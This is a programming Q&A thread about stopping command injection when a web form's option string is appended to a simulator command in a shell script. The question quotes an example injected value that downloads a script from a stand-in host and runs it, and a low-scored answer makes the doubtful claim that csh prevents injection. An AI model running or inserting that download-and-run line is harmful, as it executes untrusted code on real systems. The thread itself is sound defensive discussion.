# How to prevent command injection through command options?

Tags: bash, shell, security, quoting, arguments

I have an wrapper application where I need to let the user specify custom options to pass to a simulator. However, I want to make sure the user doesn't inject other commands through the user options. What's the best way to accomplish this?

For example.

- User provides: `-a -b`
- Application executes: `mysim --preset_opt -a -b`

However, I don't want this to happen:

- User provides: `&& wget http:\\bad.com\bad_code.sh && .\bad_code.sh`
- Application executes: `mysim --preset_opt && wget http:\\bad.com\bad_code.sh && .\bad_code.sh`

Currently, I'm thinking that I could simply surround every user provided option with single quotes `'` and strip out any user-provided single quotes, so that the command in the last example would turn out to be a harmless:

`mysim -preset_opt '&&' 'wget' 'http:\\bad.com\bad_code.sh' '&&' '.\bad_code.sh'`

Note: The `mysim` command executes as part of a shell script in a docker/lxc container. I'm running Ubuntu.

Comment: Are you using `eval` to run the application? If not, the injection should not happen: `x="&& echo Doomed" ; echo $x`

Comment: No, I'm not using `eval`. I'm calling the executable `mysim` inside a shell script. I am seeing the injection happen if I simply copy the string of options that the user provides and paste it at the end of `mysim` command.

Comment: Does the wrapper application copy and paste the string of options?

Comment: Yes, the user options come in as a single string, like `-a -b`. So I'm looking to ensure that additional commands aren't injected in that string.

Comment: can you whitelist? only allowing characters `[a-zA-Z0-9 _-]` looks like a pretty defensive choice.

Comment: Allowing only certain characters is one option. Although the list may end up growing since some options may need to use `+`, `=`, and other characters I don't know about yet. I'd like not to resort to that if there is a cleaner solution.

Comment: @VictorLyuboslavsky: How exactly do you get the user input and create the command from it?

Comment: @choroba, I know the command I need to run and some mandatory options for that command. Then I get additional options as a string from a web form. So the final command should be `mysim --my_opts` + `<user_opts>`

Comment: @VictorLyuboslavsky: in what language and how do you call the actual command?

Comment: @choroba, I put the command (along with other commands) into a run.sh file. I create a docker container image that has run.sh and other files I need. Then I call `/bin/bash -c docker run <my_image> ./run.sh` using Java ProcessBuilder.

Comment: Related Stack Overflow question: "[Bash - Escaping for proper shell injection prevention](http://stackoverflow.com/q/34898430/82216)".

Answer (score 8, accepted):

If you have control over the wrapper program, then make sure that it doesn't invoke a subshell. Deep down, an [instruction to execute a program](http://en.wikipedia.org/wiki/Exec_%28operating_system%29) consists of the full path (absolute or relative to the current directory) to the executable, and a list of strings to pass as arguments. PATH lookup, whitespace separating arguments, quoting and control operators are all provided by the shell. No shell, no pain.

For example, with a Perl wrapper, use the list form of `exec` or `system`. In many languages, call one of the `exec` or `execXXX` functions (or `unix.exec` or whatever it's called) rather than `system`, or `os.spawn` with `shell=False`, or whatever it takes.

If the wrapper is a shell script, use `"$@"` to pass down the arguments, e.g.

```
#!/bin/sh
mysim -preset-opt "$@"
```

If you have no choice and the wrapper program invokes a shell, you'll need to quote the arguments before passing them to the shell. The easy way to quote arguments is to do the following:

1. In each argument, replace each occurrence of `'` (single quote) by the four-character string `'\''`. (e.g. `don't` becomes `don'\''t`)
2. Add `'` at the beginning of each argument and also at the end of each argument. (e.g. from `don't`, `don'\''t` becomes `'don'\''t'`)
3. Concatenate the results with a space in between.

If you need to do this in a shell wrapper, here's a way.

```
arguments='-preset-opt'
for x; do
  arguments="$arguments '"
  while case $x in
    *\'*) arguments="$arguments${x%%\'*}'\\''"; x=${x#*\'};;
    *) false;; esac
  do :; done
  arguments="$arguments$x'"
done
```

(Unfortunately, bash's `${VAR//PATTERN/REPLACEMENT}` construct, which should come handy here, requires quirky quoting, and I don't think you can obtain `'\''` as the replacement text.)

Answer (score 1):

You can use Bash's `${VAR//PATTERN/REPLACEMENT}` idiom to transform a single quote `'` into `'\''` by first putting `'\''` into a variable (as an intermediate step) and then expanding this variable as the `REPLACEMENT` element in the mentioned Bash idiom.

```
# example 
{
str="don't"
escsquote="'\''"
str="'${str//\'/${escsquote}}'"
printf '%s\n' "$str"   #  'don'\''t'
}
```

Answer (score 0):

You may use `getopts` in `bash` which can parse the arguments for you, e.g.:

```
while getopts a:b: opts; do
  case ${opts} in
    a)
      A=${OPTARG}
      ;;
    b)
      B=${OPTARG}
      ;;
  esac
done
```

Answer (score -1):

To avoid injections at best, consider switching to [T]csh.
Unlike Bourne Shells, the C Shell is "limited", thus instructing one to take different, safer paths to write scripts. The "limitations" imposed by the C Shell make it one of the most reliable Shells to work with.
(E.g: Nesting is minimal to impossible, thus preventing injections at all costs; there are better ways to achieve what one want.)

Comment: Downvote but no comment? If downvoting, at least provide a reason. The answer is based upon own practical experience. Unless you have a good reason to, do not downvote, or provide a reason.